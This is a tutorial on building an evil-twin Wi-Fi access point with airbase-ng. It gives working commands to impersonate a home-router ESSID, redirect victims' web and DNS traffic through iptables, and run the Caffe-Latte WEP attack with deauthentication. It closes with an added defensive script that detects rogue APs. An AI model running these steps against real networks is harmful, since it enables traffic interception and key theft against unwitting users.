Fake AP Airbase-ng

In this tutorial I will show you how to set up a simple fake AP with airbase-ng. This can be used for several purposes, such as attacking non-associated victims by forcing them to connect automatically to your AP, thinking it is their own legitimate AP. The first thing we need to do is set up airbase-ng.

Code:
airbase-ng -e BTHomeHub2 -c 1 wlan0
Options:
-e ESSID for the AP
-c Channel number
wlan0 Wireless interface
This will then create a tap device, as shown below:

Code:
root@bt:~# airbase-ng -e BTHomeHub2 -c 1 wlan0 
08:15:24  Created tap interface at0
08:15:24  Trying to set MTU on at0 to 1500
08:15:24  Trying to set MTU on wlan0 to 1800
08:15:24  Access Point with BSSID 00:C0:CA:47:32:24 started.
Now that we have the AP running, we need to make it possible for clients to obtain an IP address, so let's bring up the at0 interface and give it an address and a route:

Code:
ifconfig at0 up 
ifconfig at0 192.168.1.254 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.254
Now that the addressing is set for the clients, we need to configure our dhcp3 server a little. Here is my dhcpd.conf:

Code:
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
# Subnet served on the at0 tap interface
subnet 192.168.1.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 192.168.1.255;
    # at0 address: default gateway for clients
    option routers 192.168.1.254;
    option domain-name-servers home;
    range 192.168.1.1 192.168.1.140;
}
Simply add this to the bottom of your /etc/dhcp3/dhcpd.conf. Once that has been entered and saved, the DHCP server can be started:

Code:
/etc/init.d/dhcp3-server start
Now all we have left to do is configure the iptables NAT and forwarding rules for the AP:

Code:
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -j DNAT --to-destination 192.168.1.254
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
echo 1 > /proc/sys/net/ipv4/ip_forward
Now you should have a fully functional fake AP. If you would like this fake AP to run the Caffe-Latte attack, just add -L -W 1 -x 150 to the airbase-ng command, for example:

Code:
airbase-ng -L -W 1 -x 150 -e BTHomeHub2 -c 1 wlan0
My Output
Code:
root@bt:~# airbase-ng -L -W 1 -x 150 -e BTHomeHub2 -c 1 wlan0 
08:33:13  Created tap interface at0
08:33:13  Trying to set MTU on at0 to 1500
08:33:13  Access Point with BSSID 00:C0:CA:47:32:24 started.
08:33:22  Client 00:1F:1F:14:4D:6B associated (WEP) to ESSID: "BTHomeHub2"
08:33:32  Client 00:1F:1F:14:4D:6B associated (WEP) to ESSID: "BTHomeHub2"
08:33:32  Starting Caffe-Latte attack against 00:1F:1F:14:4D:6B at 150 pps.
airbase-ng Options
-L Caffe-Latte attack
-W 1 WEP encryption on
-x Number of packets per second
-e ESSID
-c Channel number
wlan0 Wireless interface
The only problem is that I haven't managed to get the Caffe-Latte attack fully working, due to the fact that the only time it captures IVs correctly is when the client reconnects to the AP, so the only way I've had Caffe-Latte working kind of well is to deauthenticate the client every 10 seconds.
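
Seen from the defending side, the AP started above stands out in a wireless scan: a known ESSID is advertised from an unfamiliar BSSID, and with WEP or no encryption instead of the network's real setting. The following is an added example (not part of the original tutorial) that checks scan results against an inventory of authorised APs; the simplified scan format, the inventory, the WPA2 policy and the legitimate BSSID 00:11:22:33:44:55 are constructed assumptions.

```python
# Added example: flag likely evil-twin beacons against an inventory of
# authorised access points. All inventory and scan values are constructed.
import csv
import io

# Authorised APs per ESSID: allowed BSSIDs and the expected encryption.
# (Hypothetical inventory; the legitimate BSSID is made up.)
AUTHORISED = {
    "BTHomeHub2": {"bssids": {"00:11:22:33:44:55"}, "privacy": "WPA2"},
}

# Encryption strength ranking used to detect downgrades.
STRENGTH = {"OPN": 0, "WEP": 1, "WPA": 2, "WPA2": 3, "WPA3": 4}

# Constructed scan results, one beacon per line: BSSID, channel, privacy, ESSID.
SAMPLE_SCAN = """\
00:11:22:33:44:55,6,WPA2,BTHomeHub2
00:C0:CA:47:32:24,1,WEP,BTHomeHub2
00:C0:CA:47:32:24,1,OPN,BTHomeHub2
66:77:88:99:AA:BB,11,WPA2,CoffeeShop
"""

def find_rogue_aps(scan_text, authorised=AUTHORISED):
    """Return a list of (bssid, essid, reasons) for suspicious beacons."""
    findings = []
    for row in csv.reader(io.StringIO(scan_text)):
        if len(row) != 4:
            continue  # skip blank or malformed lines
        bssid, _channel, privacy, essid = (f.strip() for f in row)
        policy = authorised.get(essid)
        if policy is None:
            continue  # not one of our networks
        reasons = []
        if bssid.upper() not in policy["bssids"]:
            reasons.append("unknown BSSID")
        # Unknown privacy strings are treated as weakest (fail closed).
        if STRENGTH.get(privacy, 0) < STRENGTH[policy["privacy"]]:
            reasons.append(f"encryption downgrade to {privacy}")
        if reasons:
            findings.append((bssid.upper(), essid, reasons))
    return findings

if __name__ == "__main__":
    for bssid, essid, reasons in find_rogue_aps(SAMPLE_SCAN):
        print(f"ALERT {essid} from {bssid}: {', '.join(reasons)}")
```

A beacon from an authorised BSSID with weaker encryption than the policy is also reported, since a matching BSSID alone does not show that the AP is the legitimate one.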